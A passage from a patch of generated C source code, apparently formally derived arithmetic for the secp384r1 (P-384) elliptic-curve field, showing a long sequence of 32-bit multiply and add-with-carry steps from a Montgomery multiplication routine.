x805, x852); ++ fiat_secp384r1_addcarryx_u32(&x879, &x880, x878, x807, x854); ++ fiat_secp384r1_mulx_u32(&x881, &x882, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x883, &x884, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x885, &x886, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x887, &x888, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x889, &x890, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x891, &x892, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x893, &x894, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x895, &x896, x855, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x897, &x898, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x899, &x900, x855, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x901, &x902, 0x0, x898, x895); ++ fiat_secp384r1_addcarryx_u32(&x903, &x904, x902, x896, x893); ++ fiat_secp384r1_addcarryx_u32(&x905, &x906, x904, x894, x891); ++ fiat_secp384r1_addcarryx_u32(&x907, &x908, x906, x892, x889); ++ fiat_secp384r1_addcarryx_u32(&x909, &x910, x908, x890, x887); ++ fiat_secp384r1_addcarryx_u32(&x911, &x912, x910, x888, x885); ++ fiat_secp384r1_addcarryx_u32(&x913, &x914, x912, x886, x883); ++ fiat_secp384r1_addcarryx_u32(&x915, &x916, x914, x884, x881); ++ x917 = (x916 + x882); ++ fiat_secp384r1_addcarryx_u32(&x918, &x919, 0x0, x855, x899); ++ fiat_secp384r1_addcarryx_u32(&x920, &x921, x919, x857, x900); ++ fiat_secp384r1_addcarryx_u32(&x922, &x923, x921, x859, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x924, &x925, x923, x861, x897); ++ fiat_secp384r1_addcarryx_u32(&x926, &x927, x925, x863, x901); ++ fiat_secp384r1_addcarryx_u32(&x928, &x929, x927, x865, x903); ++ fiat_secp384r1_addcarryx_u32(&x930, &x931, x929, x867, x905); ++ fiat_secp384r1_addcarryx_u32(&x932, &x933, x931, x869, x907); ++ fiat_secp384r1_addcarryx_u32(&x934, &x935, x933, x871, x909); ++ fiat_secp384r1_addcarryx_u32(&x936, &x937, x935, x873, x911); ++ fiat_secp384r1_addcarryx_u32(&x938, &x939, x937, x875, x913); ++ fiat_secp384r1_addcarryx_u32(&x940, &x941, x939, x877, x915); ++ fiat_secp384r1_addcarryx_u32(&x942, &x943, x941, x879, x917); ++ x944 = ((uint32_t)x943 + x880); ++ fiat_secp384r1_mulx_u32(&x945, &x946, x7, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x947, &x948, x7, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x949, &x950, x7, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x951, &x952, x7, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x953, &x954, x7, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x955, &x956, x7, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x957, &x958, x7, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x959, &x960, x7, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x961, &x962, x7, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x963, &x964, x7, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x965, &x966, x7, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x967, &x968, x7, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x969, &x970, 0x0, x968, x965); ++ fiat_secp384r1_addcarryx_u32(&x971, &x972, x970, x966, x963); ++ fiat_secp384r1_addcarryx_u32(&x973, &x974, x972, x964, x961); ++ fiat_secp384r1_addcarryx_u32(&x975, &x976, x974, x962, x959); ++ fiat_secp384r1_addcarryx_u32(&x977, &x978, x976, x960, x957); ++ fiat_secp384r1_addcarryx_u32(&x979, &x980, x978, x958, x955); ++ fiat_secp384r1_addcarryx_u32(&x981, &x982, x980, x956, x953); ++ fiat_secp384r1_addcarryx_u32(&x983, &x984, x982, x954, x951); ++ fiat_secp384r1_addcarryx_u32(&x985, &x986, x984, x952, x949); ++ fiat_secp384r1_addcarryx_u32(&x987, &x988, x986, x950, x947); ++ fiat_secp384r1_addcarryx_u32(&x989, &x990, x988, x948, x945); ++ x991 = (x990 + x946); ++ fiat_secp384r1_addcarryx_u32(&x992, &x993, 0x0, x920, x967); ++ fiat_secp384r1_addcarryx_u32(&x994, &x995, x993, x922, x969); ++ fiat_secp384r1_addcarryx_u32(&x996, &x997, x995, x924, x971); ++ fiat_secp384r1_addcarryx_u32(&x998, &x999, x997, x926, x973); ++ fiat_secp384r1_addcarryx_u32(&x1000, &x1001, x999, x928, x975); ++ fiat_secp384r1_addcarryx_u32(&x1002, &x1003, x1001, x930, x977); ++ fiat_secp384r1_addcarryx_u32(&x1004, &x1005, x1003, x932, x979); ++ fiat_secp384r1_addcarryx_u32(&x1006, &x1007, x1005, x934, x981); ++ fiat_secp384r1_addcarryx_u32(&x1008, &x1009, x1007, x936, x983); ++ fiat_secp384r1_addcarryx_u32(&x1010, &x1011, x1009, x938, x985); ++ fiat_secp384r1_addcarryx_u32(&x1012, &x1013, x1011, x940, x987); ++ fiat_secp384r1_addcarryx_u32(&x1014, &x1015, x1013, x942, x989); ++ fiat_secp384r1_addcarryx_u32(&x1016, &x1017, x1015, x944, x991); ++ fiat_secp384r1_mulx_u32(&x1018, &x1019, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1020, &x1021, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1022, &x1023, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1024, &x1025, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1026, &x1027, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1028, &x1029, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1030, &x1031, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1032, &x1033, x992, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1034, &x1035, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1036, &x1037, x992, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1038, &x1039, 0x0, x1035, x1032); ++ fiat_secp384r1_addcarryx_u32(&x1040, &x1041, x1039, x1033, x1030); ++ fiat_secp384r1_addcarryx_u32(&x1042, &x1043, x1041, x1031, x1028); ++ fiat_secp384r1_addcarryx_u32(&x1044, &x1045, x1043, x1029, x1026); ++ fiat_secp384r1_addcarryx_u32(&x1046, &x1047, x1045, x1027, x1024); ++ fiat_secp384r1_addcarryx_u32(&x1048, &x1049, x1047, x1025, x1022); ++ fiat_secp384r1_addcarryx_u32(&x1050, &x1051, x1049, x1023, x1020); ++ fiat_secp384r1_addcarryx_u32(&x1052, &x1053, x1051, x1021, x1018); ++ x1054 = (x1053 + x1019); ++ fiat_secp384r1_addcarryx_u32(&x1055, &x1056, 0x0, x992, x1036); ++ fiat_secp384r1_addcarryx_u32(&x1057, &x1058, x1056, x994, x1037); ++ fiat_secp384r1_addcarryx_u32(&x1059, &x1060, x1058, x996, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1061, &x1062, x1060, x998, x1034); ++ fiat_secp384r1_addcarryx_u32(&x1063, &x1064, x1062, x1000, x1038); ++ fiat_secp384r1_addcarryx_u32(&x1065, &x1066, x1064, x1002, x1040); ++ fiat_secp384r1_addcarryx_u32(&x1067, &x1068, x1066, x1004, x1042); ++ fiat_secp384r1_addcarryx_u32(&x1069, &x1070, x1068, x1006, x1044); ++ fiat_secp384r1_addcarryx_u32(&x1071, &x1072, x1070, x1008, x1046); ++ fiat_secp384r1_addcarryx_u32(&x1073, &x1074, x1072, x1010, x1048); ++ fiat_secp384r1_addcarryx_u32(&x1075, &x1076, x1074, x1012, x1050); ++ fiat_secp384r1_addcarryx_u32(&x1077, &x1078, x1076, x1014, x1052); ++ fiat_secp384r1_addcarryx_u32(&x1079, &x1080, x1078, x1016, x1054); ++ x1081 = ((uint32_t)x1080 + x1017); ++ fiat_secp384r1_mulx_u32(&x1082, &x1083, x8, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x1084, &x1085, x8, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x1086, &x1087, x8, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x1088, &x1089, x8, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x1090, &x1091, x8, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x1092, &x1093, x8, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x1094, &x1095, x8, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x1096, &x1097, x8, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x1098, &x1099, x8, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x1100, &x1101, x8, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x1102, &x1103, x8, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x1104, &x1105, x8, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x1106, &x1107, 0x0, x1105, x1102); ++ fiat_secp384r1_addcarryx_u32(&x1108, &x1109, x1107, x1103, x1100); ++ fiat_secp384r1_addcarryx_u32(&x1110, &x1111, x1109, x1101, x1098); ++ fiat_secp384r1_addcarryx_u32(&x1112, &x1113, x1111, x1099, x1096); ++ fiat_secp384r1_addcarryx_u32(&x1114, &x1115, x1113, x1097, x1094); ++ fiat_secp384r1_addcarryx_u32(&x1116, &x1117, x1115, x1095, x1092); ++ fiat_secp384r1_addcarryx_u32(&x1118, &x1119, x1117, x1093, x1090); ++ fiat_secp384r1_addcarryx_u32(&x1120, &x1121, x1119, x1091, x1088); ++ fiat_secp384r1_addcarryx_u32(&x1122, &x1123, x1121, x1089, x1086); ++ fiat_secp384r1_addcarryx_u32(&x1124, &x1125, x1123, x1087, x1084); ++ fiat_secp384r1_addcarryx_u32(&x1126, &x1127, x1125, x1085, x1082); ++ x1128 = (x1127 + x1083); ++ fiat_secp384r1_addcarryx_u32(&x1129, &x1130, 0x0, x1057, x1104); ++ fiat_secp384r1_addcarryx_u32(&x1131, &x1132, x1130, x1059, x1106); ++ fiat_secp384r1_addcarryx_u32(&x1133, &x1134, x1132, x1061, x1108); ++ fiat_secp384r1_addcarryx_u32(&x1135, &x1136, x1134, x1063, x1110); ++ fiat_secp384r1_addcarryx_u32(&x1137, &x1138, x1136, x1065, x1112); ++ fiat_secp384r1_addcarryx_u32(&x1139, &x1140, x1138, x1067, x1114); ++ fiat_secp384r1_addcarryx_u32(&x1141, &x1142, x1140, x1069, x1116); ++ fiat_secp384r1_addcarryx_u32(&x1143, &x1144, x1142, x1071, x1118); ++ fiat_secp384r1_addcarryx_u32(&x1145, &x1146, x1144, x1073, x1120); ++ fiat_secp384r1_addcarryx_u32(&x1147, &x1148, x1146, x1075, x1122); ++ fiat_secp384r1_addcarryx_u32(&x1149, &x1150, x1148, x1077, x1124); ++ fiat_secp384r1_addcarryx_u32(&x1151, &x1152, x1150, x1079, x1126); ++ fiat_secp384r1_addcarryx_u32(&x1153, &x1154, x1152, x1081, x1128); ++ fiat_secp384r1_mulx_u32(&x1155, &x1156, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1157, &x1158, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1159, &x1160, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1161, &x1162, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1163, &x1164, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1165, &x1166, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1167, &x1168, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1169, &x1170, x1129, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1171, &x1172, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1173, &x1174, x1129, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1175, &x1176, 0x0, x1172, x1169); ++ fiat_secp384r1_addcarryx_u32(&x1177, &x1178, x1176, x1170, x1167); ++ fiat_secp384r1_addcarryx_u32(&x1179, &x1180, x1178, x1168, x1165); ++ fiat_secp384r1_addcarryx_u32(&x1181, &x1182, x1180, x1166, x1163); ++ fiat_secp384r1_addcarryx_u32(&x1183, &x1184, x1182, x1164, x1161); ++ fiat_secp384r1_addcarryx_u32(&x1185, &x1186, x1184, x1162, x1159); ++ fiat_secp384r1_addcarryx_u32(&x1187, &x1188, x1186, x1160, x1157); ++ fiat_secp384r1_addcarryx_u32(&x1189, &x1190, x1188, x1158, x1155); ++ x1191 = (x1190 + x1156); ++ fiat_secp384r1_addcarryx_u32(&x1192, &x1193, 0x0, x1129, x1173); ++ fiat_secp384r1_addcarryx_u32(&x1194, &x1195, x1193, x1131, x1174); ++ fiat_secp384r1_addcarryx_u32(&x1196, &x1197, x1195, x1133, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1198, &x1199, x1197, x1135, x1171); ++ fiat_secp384r1_addcarryx_u32(&x1200, &x1201, x1199, x1137, x1175); ++ fiat_secp384r1_addcarryx_u32(&x1202, &x1203, x1201, x1139, x1177); ++ fiat_secp384r1_addcarryx_u32(&x1204, &x1205, x1203, x1141, x1179); ++ fiat_secp384r1_addcarryx_u32(&x1206, &x1207, x1205, x1143, x1181); ++ fiat_secp384r1_addcarryx_u32(&x1208, &x1209, x1207, x1145, x1183); ++ fiat_secp384r1_addcarryx_u32(&x1210, &x1211, x1209, x1147, x1185); ++ fiat_secp384r1_addcarryx_u32(&x1212, &x1213, x1211, x1149, x1187); ++ fiat_secp384r1_addcarryx_u32(&x1214, &x1215, x1213, x1151, x1189); ++ fiat_secp384r1_addcarryx_u32(&x1216, &x1217, x1215, x1153, x1191); ++ x1218 = ((uint32_t)x1217 + x1154); ++ fiat_secp384r1_mulx_u32(&x1219, &x1220, x9, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x1221, &x1222, x9, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x1223, &x1224, x9, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x1225, &x1226, x9, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x1227, &x1228, x9, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x1229, &x1230, x9, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x1231, &x1232, x9, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x1233, &x1234, x9, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x1235, &x1236, x9, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x1237, &x1238, x9, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x1239, &x1240, x9, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x1241, &x1242, x9, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x1243, &x1244, 0x0, x1242, x1239); ++ fiat_secp384r1_addcarryx_u32(&x1245, &x1246, x1244, x1240, x1237); ++ fiat_secp384r1_addcarryx_u32(&x1247, &x1248, x1246, x1238, x1235); ++ fiat_secp384r1_addcarryx_u32(&x1249, &x1250, x1248, x1236, x1233); ++ fiat_secp384r1_addcarryx_u32(&x1251, &x1252, x1250, x1234, x1231); ++ fiat_secp384r1_addcarryx_u32(&x1253, &x1254, x1252, x1232, x1229); ++ fiat_secp384r1_addcarryx_u32(&x1255, &x1256, x1254, x1230, x1227); ++ fiat_secp384r1_addcarryx_u32(&x1257, &x1258, x1256, x1228, x1225); ++ fiat_secp384r1_addcarryx_u32(&x1259, &x1260, x1258, x1226, x1223); ++ fiat_secp384r1_addcarryx_u32(&x1261, &x1262, x1260, x1224, x1221); ++ fiat_secp384r1_addcarryx_u32(&x1263, &x1264, x1262, x1222, x1219); ++ x1265 = (x1264 + x1220); ++ fiat_secp384r1_addcarryx_u32(&x1266, &x1267, 0x0, x1194, x1241); ++ fiat_secp384r1_addcarryx_u32(&x1268, &x1269, x1267, x1196, x1243); ++ fiat_secp384r1_addcarryx_u32(&x1270, &x1271, x1269, x1198, x1245); ++ fiat_secp384r1_addcarryx_u32(&x1272, &x1273, x1271, x1200, x1247); ++ fiat_secp384r1_addcarryx_u32(&x1274, &x1275, x1273, x1202, x1249); ++ fiat_secp384r1_addcarryx_u32(&x1276, &x1277, x1275, x1204, x1251); ++ fiat_secp384r1_addcarryx_u32(&x1278, &x1279, x1277, x1206, x1253); ++ fiat_secp384r1_addcarryx_u32(&x1280, &x1281, x1279, x1208, x1255); ++ fiat_secp384r1_addcarryx_u32(&x1282, &x1283, x1281, x1210, x1257); ++ fiat_secp384r1_addcarryx_u32(&x1284, &x1285, x1283, x1212, x1259); ++ fiat_secp384r1_addcarryx_u32(&x1286, &x1287, x1285, x1214, x1261); ++ fiat_secp384r1_addcarryx_u32(&x1288, &x1289, x1287, x1216, x1263); ++ fiat_secp384r1_addcarryx_u32(&x1290, &x1291, x1289, x1218, x1265); ++ fiat_secp384r1_mulx_u32(&x1292, &x1293, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1294, &x1295, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1296, &x1297, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1298, &x1299, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1300, &x1301, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1302, &x1303, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1304, &x1305, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1306, &x1307, x1266, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1308, &x1309, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1310, &x1311, x1266, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1312, &x1313, 0x0, x1309, x1306); ++ fiat_secp384r1_addcarryx_u32(&x1314, &x1315, x1313, x1307, x1304); ++ fiat_secp384r1_addcarryx_u32(&x1316, &x1317, x1315, x1305, x1302); ++ fiat_secp384r1_addcarryx_u32(&x1318, &x1319, x1317, x1303, x1300); ++ fiat_secp384r1_addcarryx_u32(&x1320, &x1321, x1319, x1301, x1298); ++ fiat_secp384r1_addcarryx_u32(&x1322, &x1323, x1321, x1299, x1296); ++ fiat_secp384r1_addcarryx_u32(&x1324, &x1325, x1323, x1297, x1294); ++ fiat_secp384r1_addcarryx_u32(&x1326, &x1327, x1325, x1295, x1292); ++ x1328 = (x1327 + x1293); ++ fiat_secp384r1_addcarryx_u32(&x1329, &x1330, 0x0, x1266, x1310); ++ fiat_secp384r1_addcarryx_u32(&x1331, &x1332, x1330, x1268, x1311); ++ fiat_secp384r1_addcarryx_u32(&x1333, &x1334, x1332, x1270, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1335, &x1336, x1334, x1272, x1308); ++ fiat_secp384r1_addcarryx_u32(&x1337, &x1338, x1336, x1274, x1312); ++ fiat_secp384r1_addcarryx_u32(&x1339, &x1340, x1338, x1276, x1314); ++ fiat_secp384r1_addcarryx_u32(&x1341, &x1342, x1340, x1278, x1316); ++ fiat_secp384r1_addcarryx_u32(&x1343, &x1344, x1342, x1280, x1318); ++ fiat_secp384r1_addcarryx_u32(&x1345, &x1346, x1344, x1282, x1320); ++ fiat_secp384r1_addcarryx_u32(&x1347, &x1348, x1346, x1284, x1322); ++ fiat_secp384r1_addcarryx_u32(&x1349, &x1350, x1348, x1286, x1324); ++ fiat_secp384r1_addcarryx_u32(&x1351, &x1352, x1350, x1288, x1326); ++ fiat_secp384r1_addcarryx_u32(&x1353, &x1354, x1352, x1290, x1328); ++ x1355 = ((uint32_t)x1354 + x1291); ++ fiat_secp384r1_mulx_u32(&x1356, &x1357, x10, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x1358, &x1359, x10, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x1360, &x1361, x10, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x1362, &x1363, x10, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x1364, &x1365, x10, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x1366, &x1367, x10, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x1368, &x1369, x10, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x1370, &x1371, x10, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x1372, &x1373, x10, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x1374, &x1375, x10, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x1376, &x1377, x10, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x1378, &x1379, x10, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x1380, &x1381, 0x0, x1379, x1376); ++ fiat_secp384r1_addcarryx_u32(&x1382, &x1383, x1381, x1377, x1374); ++ fiat_secp384r1_addcarryx_u32(&x1384, &x1385, x1383, x1375, x1372); ++ fiat_secp384r1_addcarryx_u32(&x1386, &x1387, x1385, x1373, x1370); ++ fiat_secp384r1_addcarryx_u32(&x1388, &x1389, x1387, x1371, x1368); ++ fiat_secp384r1_addcarryx_u32(&x1390, &x1391, x1389, x1369, x1366); ++ fiat_secp384r1_addcarryx_u32(&x1392, &x1393, x1391, x1367, x1364); ++ fiat_secp384r1_addcarryx_u32(&x1394, &x1395, x1393, x1365, x1362); ++ fiat_secp384r1_addcarryx_u32(&x1396, &x1397, x1395, x1363, x1360); ++ fiat_secp384r1_addcarryx_u32(&x1398, &x1399, x1397, x1361, x1358); ++ fiat_secp384r1_addcarryx_u32(&x1400, &x1401, x1399, x1359, x1356); ++ x1402 = (x1401 + x1357); ++ fiat_secp384r1_addcarryx_u32(&x1403, &x1404, 0x0, x1331, x1378); ++ fiat_secp384r1_addcarryx_u32(&x1405, &x1406, x1404, x1333, x1380); ++ fiat_secp384r1_addcarryx_u32(&x1407, &x1408, x1406, x1335, x1382); ++ fiat_secp384r1_addcarryx_u32(&x1409, &x1410, x1408, x1337, x1384); ++ fiat_secp384r1_addcarryx_u32(&x1411, &x1412, x1410, x1339, x1386); ++ fiat_secp384r1_addcarryx_u32(&x1413, &x1414, x1412, x1341, x1388); ++ fiat_secp384r1_addcarryx_u32(&x1415, &x1416, x1414, x1343, x1390); ++ fiat_secp384r1_addcarryx_u32(&x1417, &x1418, x1416, x1345, x1392); ++ fiat_secp384r1_addcarryx_u32(&x1419, &x1420, x1418, x1347, x1394); ++ fiat_secp384r1_addcarryx_u32(&x1421, &x1422, x1420, x1349, x1396); ++ fiat_secp384r1_addcarryx_u32(&x1423, &x1424, x1422, x1351, x1398); ++ fiat_secp384r1_addcarryx_u32(&x1425, &x1426, x1424, x1353, x1400); ++ fiat_secp384r1_addcarryx_u32(&x1427, &x1428, x1426, x1355, x1402); ++ fiat_secp384r1_mulx_u32(&x1429, &x1430, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1431, &x1432, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1433, &x1434, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1435, &x1436, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1437, &x1438, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1439, &x1440, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1441, &x1442, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1443, &x1444, x1403, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1445, &x1446, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1447, &x1448, x1403, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1449, &x1450, 0x0, x1446, x1443); ++ fiat_secp384r1_addcarryx_u32(&x1451, &x1452, x1450, x1444, x1441); ++ fiat_secp384r1_addcarryx_u32(&x1453, &x1454, x1452, x1442, x1439); ++ fiat_secp384r1_addcarryx_u32(&x1455, &x1456, x1454, x1440, x1437); ++ fiat_secp384r1_addcarryx_u32(&x1457, &x1458, x1456, x1438, x1435); ++ fiat_secp384r1_addcarryx_u32(&x1459, &x1460, x1458, x1436, x1433); ++ fiat_secp384r1_addcarryx_u32(&x1461, &x1462, x1460, x1434, x1431); ++ fiat_secp384r1_addcarryx_u32(&x1463, &x1464, x1462, x1432, x1429); ++ x1465 = (x1464 + x1430); ++ fiat_secp384r1_addcarryx_u32(&x1466, &x1467, 0x0, x1403, x1447); ++ fiat_secp384r1_addcarryx_u32(&x1468, &x1469, x1467, x1405, x1448); ++ fiat_secp384r1_addcarryx_u32(&x1470, &x1471, x1469, x1407, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1472, &x1473, x1471, x1409, x1445); ++ fiat_secp384r1_addcarryx_u32(&x1474, &x1475, x1473, x1411, x1449); ++ fiat_secp384r1_addcarryx_u32(&x1476, &x1477, x1475, x1413, x1451); ++ fiat_secp384r1_addcarryx_u32(&x1478, &x1479, x1477, x1415, x1453); ++ fiat_secp384r1_addcarryx_u32(&x1480, &x1481, x1479, x1417, x1455); ++ fiat_secp384r1_addcarryx_u32(&x1482, &x1483, x1481, x1419, x1457); ++ fiat_secp384r1_addcarryx_u32(&x1484, &x1485, x1483, x1421, x1459); ++ fiat_secp384r1_addcarryx_u32(&x1486, &x1487, x1485, x1423, x1461); ++ fiat_secp384r1_addcarryx_u32(&x1488, &x1489, x1487, x1425, x1463); ++ fiat_secp384r1_addcarryx_u32(&x1490, &x1491, x1489, x1427, x1465); ++ x1492 = ((uint32_t)x1491 + x1428); ++ fiat_secp384r1_mulx_u32(&x1493, &x1494, x11, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x1495, &x1496, x11, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x1497, &x1498, x11, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x1499, &x1500, x11, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x1501, &x1502, x11, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x1503, &x1504, x11, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x1505, &x1506, x11, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x1507, &x1508, x11, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x1509, &x1510, x11, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x1511, &x1512, x11, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x1513, &x1514, x11, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x1515, &x1516, x11, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x1517, &x1518, 0x0, x1516, x1513); ++ fiat_secp384r1_addcarryx_u32(&x1519, &x1520, x1518, x1514, x1511); ++ fiat_secp384r1_addcarryx_u32(&x1521, &x1522, x1520, x1512, x1509); ++ fiat_secp384r1_addcarryx_u32(&x1523, &x1524, x1522, x1510, x1507); ++ fiat_secp384r1_addcarryx_u32(&x1525, &x1526, x1524, x1508, x1505); ++ fiat_secp384r1_addcarryx_u32(&x1527, &x1528, x1526, x1506, x1503); ++ fiat_secp384r1_addcarryx_u32(&x1529, &x1530, x1528, x1504, x1501); ++ fiat_secp384r1_addcarryx_u32(&x1531, &x1532, x1530, x1502, x1499); ++ fiat_secp384r1_addcarryx_u32(&x1533, &x1534, x1532, x1500, x1497); ++ fiat_secp384r1_addcarryx_u32(&x1535, &x1536, x1534, x1498, x1495); ++ fiat_secp384r1_addcarryx_u32(&x1537, &x1538, x1536, x1496, x1493); ++ x1539 = (x1538 + x1494); ++ fiat_secp384r1_addcarryx_u32(&x1540, &x1541, 0x0, x1468, x1515); ++ fiat_secp384r1_addcarryx_u32(&x1542, &x1543, x1541, x1470, x1517); ++ fiat_secp384r1_addcarryx_u32(&x1544, &x1545, x1543, x1472, x1519); ++ fiat_secp384r1_addcarryx_u32(&x1546, &x1547, x1545, x1474, x1521); ++ fiat_secp384r1_addcarryx_u32(&x1548, &x1549, x1547, x1476, x1523); ++ fiat_secp384r1_addcarryx_u32(&x1550, &x1551, x1549, x1478, x1525); ++ fiat_secp384r1_addcarryx_u32(&x1552, &x1553, x1551, x1480, x1527); ++ fiat_secp384r1_addcarryx_u32(&x1554, &x1555, x1553, x1482, x1529); ++ fiat_secp384r1_addcarryx_u32(&x1556, &x1557, x1555, x1484, x1531); ++ fiat_secp384r1_addcarryx_u32(&x1558, &x1559, x1557, x1486, x1533); ++ fiat_secp384r1_addcarryx_u32(&x1560, &x1561, x1559, x1488, x1535); ++ fiat_secp384r1_addcarryx_u32(&x1562, &x1563, x1561, x1490, x1537); ++ fiat_secp384r1_addcarryx_u32(&x1564, &x1565, x1563, x1492, x1539); ++ fiat_secp384r1_mulx_u32(&x1566, &x1567, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1568, &x1569, 